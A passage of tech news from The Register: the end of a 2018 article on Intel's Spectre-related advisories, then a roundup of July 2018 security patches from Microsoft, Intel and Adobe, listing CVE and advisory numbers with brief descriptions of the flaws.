The other good news is that there is little or no malware known to be circulating in the wild exploiting Spectre vulnerabilities to steal information: it is far easier for miscreants to persuade people to download and install software nasties disguised as legit applications, trick them with phishing emails, or attack holes in email clients and PDF readers, to commandeer their PCs.

Instead, Spectre, for now, remains a fascinating insight into the world of CPU design, where engineers across the industry trade off a little security for a little more performance.

Streamlining

“As we continue working with industry researchers, partners and academia to protect customers against evolving security threats, we are streamlining security updates and guidance for our industry partners and customers when possible,” a spokesperson for Intel told The Register on Tuesday.

“With this in mind, today we are providing mitigation details for a number of potential issues, including a new sub-variant of [Spectre] variant 1 called Bounds Check Bypass Store, for which mitigations or developer guidance have been released.

“More information can be found on our product security page. Protecting our customers’ data and ensuring the security of our products is a top priority for Intel.”

More than half of today’s Chipzilla advisories were the result of research carried out by its own staff, whose minds have been doubly focused on the security of their products following the Meltdown and Spectre disclosures earlier this year. The alerts will cover things from firmware to Intel’s flavor of Python. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/10/intel_security_spectre_advisories/

Intel, Microsoft, Adobe release a swarm of bug fixes to ruin your week

IT admins face a busy week ahead as Microsoft, Intel, and Adobe have issued bundles of scheduled security fixes addressing more than 150 CVE-listed vulnerabilities.

Surprise, surprise, Microsoft has a ton of browser fixes

For Redmond, the July Patch Tuesday will bring fixes for 53 individual bugs, 25 of those allowing for remote code execution attacks.

This includes the usual array of Edge and Internet Explorer memory corruption flaws that could allow an attacker to place exploits within a web page and use them to take over a system with the current user’s rights.

RCE bugs were also patched in the PowerShell Editor Services (CVE-2018-8327), Visual Studio (CVE-2018-8172), and .NET Framework (CVE-2018-8260), SharePoint (CVE-2018-8300), Wireless Display Adaptor (CVE-2018-8306), Skype for Business and Lync (CVE-2018-8311), Access (CVE-2018-8313), and Office (CVE-2018-8281).

Outside of the 25 remote code execution flaws, ZDI researcher Dustin Childs says admins will want to pay special attention to CVE-2018-8319, a security bypass flaw in the MSR JavaScript Cryptography Library, CVE-2018-8304, a denial of service in the Windows DNSAPI, and CVE-2018-8310, a tampering vulnerability in the way Outlook handles attachments in HTML emails, clearing the way for additional attacks via malicious fonts.

“An attacker exploiting this vulnerability could embed untrusted TrueType fonts into an email,” Childs explained. “Bugs in fonts have been popular since 2013 and have been used in malware attacks in the past. This bug could allow them to spread and possibly even bypass traditional filters.”

Intel kicks off quarterly update campaign

The first edition of Intel’s new quarterly security update program also arrived on Tuesday, with Chipzilla patching a dozen holes in its platforms.

In addition to the new Spectre side-channel variant described in detail here, the Intel update includes a fix for CVE-2017-5704, a flaw that could allow an attacker with local access to pull the BIOS or AMT passwords out of memory.

Other advisories from Chipzilla include:

  • SA-00159, a condition where EDK 2 untested memory is left unprotected by SMM Page Protection in Tianocore firmware, potentially allowing elevation of privilege and information disclosure.
  • SA-00158, what Intel describes as elevation of privilege from “insecure handling of certain UEFI variables”.
  • SA-00157, a fix for a denial of service bug in the bottle.py component in Quartus Prime Pro.
  • SA-00152, an elevation of privilege bug from a firmware authentication bypass in 4th generation and later Core processors.
  • SA-00151, a bug in Quartus that allows an attacker to replace the required executables that load on reboot.
  • SA-00132, an input validation error that could allow for denial of service in VTune Amplifier, Advisor, and Inspector.
  • SA-00130, a denial of service flaw in the BMC firmware.
  • SA-00129, a denial of service bug caused by an input validation error in the Bleach module of the Intel Distribution for Python (IDP).
  • SA-00118, a fix for an elevation of privilege error in the Converged Security Management Engine (CSME).
  • SA-00114, a bug in the Optane memory module that left some media running Whole Disk Encryption “unencrypted and potentially accessible under specific conditions”. Intel doesn’t say what those conditions are, but the attacker would need physical access to the storage.
  • SA-00112, a fix for an elevation of privilege flaw in the Active Management Technology component of CSME.

Massive Adobe Reader and Acrobat patches

This month, Adobe somehow managed to find itself plugging nearly twice as many security holes as Microsoft.

Most of the fixes came in the form of a monster patch for Reader and Acrobat that covers 104 CVE-listed vulnerabilities. Adobe says the bugs are all rated either ‘critical’ or ‘important’ and include both remote code execution and information disclosure flaws that would be exploited via malicious PDF files.

Flash Player is getting an update for two flaws, one allowing remote code execution and another information disclosure. Three more flaws were spotted and squashed in Adobe Connect allowing for authentication bypass, while three server-side request forgery bugs were patched in the Adobe Experience Manager. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/july_patch_tuesday/